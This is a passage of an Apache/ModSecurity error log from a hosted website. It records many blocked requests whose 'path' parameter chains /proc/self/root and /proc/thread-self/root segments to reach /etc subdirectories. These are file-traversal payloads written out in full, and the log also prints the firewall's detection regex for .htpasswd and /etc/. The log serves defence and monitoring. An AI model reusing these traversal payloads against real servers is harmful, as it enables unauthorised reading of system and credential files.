"abqNzMdf6f5d65gmYZS9OQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:37.955425 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:59390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNzda6ubjKNq_cu4aBcwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:38.623278 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:32810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNzgkwaGbbGflqUZD54gAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:34:39.275027 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:59396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNzwkwaGbbGflqUZD54wAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:39.979477 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.241.31:58596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNzymAPhZkrhU8w4lWWgAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:34:40.791737 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:47328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN0OyqAr6etmhZHNqnFAAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:44.795473 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:58612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN1NY0UrI5A3LftIyJswAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:34:46.816830 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:47336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN1uyqAr6etmhZHNqnHQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:48.251132 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:47342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN2OoXxyEfFpUF8f9X5gAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:51.995235 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:37828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN2-oXxyEfFpUF8f9X6wAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:53.283054 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:37834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN3da6ubjKNq_cu4aBgQAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:54.589373 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:37850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN3vu8EFLIOrSqIpvuPAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:55.867864 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:37856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN3-oXxyEfFpUF8f9X7gAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:57.191444 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:37864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN4eoXxyEfFpUF8f9X8QAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:58.687186 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:37874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN4uoXxyEfFpUF8f9X-QAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:35:00.000736 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:44698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN49a6ubjKNq_cu4aBhgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:35:03.635481 2026] [mime_magic:error] [pid 17887:tid 140411666392832] (70014)End of file found: [client 74.7.243.128:44702] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/sys
[Wed Mar 18 08:35:04.558611 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:44718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN6OoXxyEfFpUF8f9YAwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:35:13.727547 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:44732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN8dY0UrI5A3LftIyJywAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:35:27.619938 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:40508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqN_ymAPhZkrhU8w4lWdwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:35:28.959500 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:50892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOAEzinOy1jxa1j4f8gAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:35:30.250667 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:46626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOAtY0UrI5A3LftIyJ1gAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:35:33.779716 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:46640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOBdY0UrI5A3LftIyJ3gAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
